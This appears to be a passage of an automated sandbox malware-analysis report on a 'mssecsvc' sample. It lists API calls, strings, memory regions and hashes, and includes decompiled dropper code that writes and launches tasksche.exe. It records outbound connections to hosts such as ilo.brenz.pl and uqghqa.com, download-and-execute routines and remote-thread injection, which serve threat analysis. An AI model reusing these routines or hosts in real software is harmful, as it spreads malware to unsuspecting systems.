                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
                    • String ID: C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 541178049-3060447344
                    • Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction ID: 22e347590fa49a5ba3addc16570a76a3e925003c3a1d5432651f21464d246bd4
                    • Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
                    • Instruction Fuzzy Hash: 75A1ECB1518259BEEB219F248C4EBEA7FECEF41300F044689E9499E0C2D7F05F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(7FEA3F54), ref: 7FEA3F60
                      • Part of subcall function 7FEA3F8F: LoadLibraryA.KERNEL32(7FEA3F83), ref: 7FEA3F8F
                      • Part of subcall function 7FEA3F8F: WSAStartup.WS2_32(00000101), ref: 7FEA3FCE
                      • Part of subcall function 7FEA3F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                      • Part of subcall function 7FEA3F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                      • Part of subcall function 7FEA3F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                      • Part of subcall function 7FEA3F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                      • Part of subcall function 7FEA3F8F: connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                      • Part of subcall function 7FEA3F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    Strings
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2996464229-3876287451
                    • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
                    • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(00B03F54), ref: 00B03F60
                      • Part of subcall function 00B03F8F: LoadLibraryA.KERNEL32(00B03F83), ref: 00B03F8F
                      • Part of subcall function 00B03F8F: WSAStartup.WS2_32(00000101), ref: 00B03FCE
                      • Part of subcall function 00B03F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                      • Part of subcall function 00B03F8F: CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                      • Part of subcall function 00B03F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                      • Part of subcall function 00B03F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                      • Part of subcall function 00B03F8F: connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                      • Part of subcall function 00B03F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    Strings
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2996464229-3876287451
                    • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction ID: 3742f42243748dd9207c2b4828354a434c13bb300a0f547106572c9e8aa24cf9
                    • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction Fuzzy Hash: 2D81EEB1518258BEEB219F24885DBEA7FECEF41300F044598E9499E0C2D7F45F4587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
                    • Sleep.KERNEL32(0000EA60), ref: 7FEA3911
                    • InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
                    • gethostbyname.WS2_32(0D278125), ref: 7FEA396C
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
                    • ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
                    • connect.WS2_32(?,?,00000010), ref: 7FEA39B3
                    • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
                    • closesocket.WS2_32 ref: 7FEA3A20
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                    • String ID: uqghqa.com
                    • API String ID: 159131500-3379764604
                    • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
                    • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                      • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    • FreeLibrary.KERNEL32(76EF0000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
                    • CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                    • Process32First.KERNEL32 ref: 7FEA07DC
                    • Process32Next.KERNEL32 ref: 7FEA07ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                    • CloseHandle.KERNEL32 ref: 7FEA086C
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                    • String ID: csrs
                    • API String ID: 3908997113-2321902090
                    • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
                    • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
                      • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                      • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                      • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                      • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                      • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                      • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                      • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
                    • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                    • String ID:
                    • API String ID: 1995088466-0
                    • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
                    • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetTempPathA.KERNEL32(00000104), ref: 00B0278C
                      • Part of subcall function 00B027A7: GetTempFileNameA.KERNEL32(?,00B027A3,00000000,?), ref: 00B027A8
                      • Part of subcall function 00B027A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B027A3,00000000,?), ref: 00B027C3
                      • Part of subcall function 00B027A7: InternetReadFile.WININET(?,?,00000104), ref: 00B027DD
                      • Part of subcall function 00B027A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027F3
                      • Part of subcall function 00B027A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027FF
                      • Part of subcall function 00B027A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B027A3), ref: 00B02823
                      • Part of subcall function 00B027A7: InternetCloseHandle.WININET(?), ref: 00B02833
                    • InternetCloseHandle.WININET(00000000), ref: 00B0283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                    • String ID:
                    • API String ID: 1995088466-0
                    • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction ID: 2fff0ff5af8c6465178c1c561c4d0f8c3a67871aa8ea1ef7c45b64e975e68631
                    • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction Fuzzy Hash: 8821DCB1144206BFE7215B20CC8EFEB3E6CEF95B00F000168FA09890C2D7B19E0986A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                    • InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                    • CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                    • InternetCloseHandle.WININET(?), ref: 7FEA2833
                    • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                    • String ID:
                    • API String ID: 3452404049-0
                    • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
                    • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(00B01162,00B00796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0116F
                      • Part of subcall function 00B01196: GetProcAddress.KERNEL32(00000000,00B01180), ref: 00B01197
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: 13i)$\itatVt
                    • API String ID: 2574300362-2541380276
                    • Opcode ID: ef1c02a20ae2fe7b2610488eb63e9b94eb073bcd6a047e20706c38331bd00a3c
                    • Instruction ID: 6b76abf3043018188ab4131f4f48b2ebe36e306b94786e913a1f9019d870e410
                    • Opcode Fuzzy Hash: ef1c02a20ae2fe7b2610488eb63e9b94eb073bcd6a047e20706c38331bd00a3c
                    • Instruction Fuzzy Hash: AC71456251C6C26FDB1B86388DAB5C9FFE0FA127A034C8ADEC4C15B9C3D7589513C286
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(01E2F8E4), ref: 7FEA113D
                    • GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: .DLL
                    • API String ID: 1646373207-899428287
                    • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
                    • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(01E2F8E4), ref: 00B0113D
                    • GetProcAddress.KERNEL32(00000000,00B011D6), ref: 00B01148
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: .DLL
                    • API String ID: 1646373207-899428287
                    • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction ID: c3d0a0a9aaca42a511bcd59da19942ef0d532df52aeb98cf39af17153e687186
                    • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction Fuzzy Hash: D6019630607005FADF6D9E6CC889BAA3FEDFF08351F104994EA1A9B1D6C7B0CE508695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage: 71.8%
                    Dynamic/Decrypted Code Coverage: 0%
                    Signature Coverage: 0%
                    Total number of Nodes: 37
                    Total number of Limit Nodes: 9

                    Callgraph

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00407CE0() {
                    				void _v259;
                    				char _v260;
                    				void _v519;
                    				char _v520;
                    				struct _STARTUPINFOA _v588;
                    				struct _PROCESS_INFORMATION _v604;
                    				long _v608;
                    				_Unknown_base(*)()* _t36;
                    				void* _t38;
                    				void* _t39;
                    				void* _t50;
                    				int _t59;
                    				struct HINSTANCE__* _t104;
                    				struct HRSRC__* _t105;
                    				void* _t107;
                    				void* _t108;
                    				long _t109;
                    				intOrPtr _t121;
                    				intOrPtr _t122;
                    
                    				_t104 = GetModuleHandleW(L"kernel32.dll");
                    				if(_t104 != 0) {
                    					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                    					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                    					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                    					_t36 = GetProcAddress(_t104, "CloseHandle");
                    					 *0x43144c = _t36;
                    					if( *0x431478 != 0) {
                    						_t121 =  *0x431458; // 0x7705f7b0
                    						if(_t121 != 0) {
                    							_t122 =  *0x431460; // 0x7705fc30
                    							if(_t122 != 0 && _t36 != 0) {
                    								_t105 = FindResourceA(0, 0x727, "R");
                    								if(_t105 != 0) {
                    									_t38 = LoadResource(0, _t105);
                    									if(_t38 != 0) {
                    										_t39 = LockResource(_t38);
                    										_v608 = _t39;
                    										if(_t39 != 0) {
                    											_t109 = SizeofResource(0, _t105);
                    											if(_t109 != 0) {
                    												_v520 = 0;
                    												memset( &_v519, 0, 0x40 << 2);
                    												asm("stosw");
                    												asm("stosb");
                    												_v260 = 0;
                    												memset( &_v259, 0, 0x40 << 2);
                    												asm("stosw");
                    												asm("stosb");
                    												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                    												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                    												MoveFileExA( &_v520,  &_v260, 1); // executed
                    												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                    												_t107 = _t50;
                    												if(_t107 != 0xffffffff) {
                    													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                    													FindCloseChangeNotification(_t107); // executed
                    													_v604.hThread = 0;
                    													_v604.dwProcessId = 0;
                    													_v604.dwThreadId = 0;
                    													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                    													asm("repne scasb");
                    													_v604.hProcess = 0;
                    													_t108 = " /i";
                    													asm("repne scasb");
                    													memcpy( &_v520 - 1, _t108, 0 << 2);
                    													memcpy(_t108 + 0x175b75a, _t108, 0);
                    													_v588.cb = 0x44;
                    													_v588.wShowWindow = 0;
                    													_v588.dwFlags = 0x81;
                    													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                    													if(_t59 != 0) {
                    														CloseHandle(_v604.hThread);
                    														CloseHandle(_v604);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return 0;
                    			}

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F75FB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                    • CreateProcessA.KERNELBASE ref: 00407EE8
                    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                    • CloseHandle.KERNEL32(08000000), ref: 00407F02
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 1541710770-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                    				CHAR* _v8;
                    				intOrPtr* _v24;
                    				intOrPtr _v28;
                    				struct _STARTUPINFOA _v96;
                    				int _v100;
                    				char** _v104;
                    				int _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				intOrPtr _v124;
                    				void* _t27;
                    				intOrPtr _t36;
                    				signed int _t38;
                    				int _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    
                    				_push(0xffffffff);
                    				_push(0x40a1a0);
                    				_push(0x409ba2);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t58;
                    				_v28 = _t58 - 0x68;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x70f894 =  *0x70f894 | 0xffffffff;
                    				 *0x70f898 =  *0x70f898 | 0xffffffff;
                    				 *(__p__fmode()) =  *0x70f88c;
                    				 *(__p__commode()) =  *0x70f888;
                    				 *0x70f890 = _adjust_fdiv;
                    				_t27 = E00409BA1( *_adjust_fdiv);
                    				_t61 =  *0x431410; // 0x1
                    				if(_t61 == 0) {
                    					__setusermatherr(E00409B9E);
                    				}
                    				E00409B8C(_t27);
                    				_push(0x40b010);
                    				_push(0x40b00c);
                    				L00409B86();
                    				_v112 =  *0x70f884;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                    				_push(0x40b008);
                    				_push(0x40b000); // executed
                    				L00409B86(); // executed
                    				_t55 =  *_acmdln;
                    				_v120 = _t55;
                    				if( *_t55 != 0x22) {
                    					while( *_t55 > 0x20) {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				} else {
                    					do {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    						_t42 =  *_t55;
                    					} while (_t42 != 0 && _t42 != 0x22);
                    					if( *_t55 == 0x22) {
                    						L6:
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				}
                    				_t36 =  *_t55;
                    				if(_t36 != 0 && _t36 <= 0x20) {
                    					goto L6;
                    				}
                    				_v96.dwFlags = 0;
                    				GetStartupInfoA( &_v96);
                    				if((_v96.dwFlags & 0x00000001) == 0) {
                    					_t38 = 0xa;
                    				} else {
                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                    				}
                    				_push(_t38);
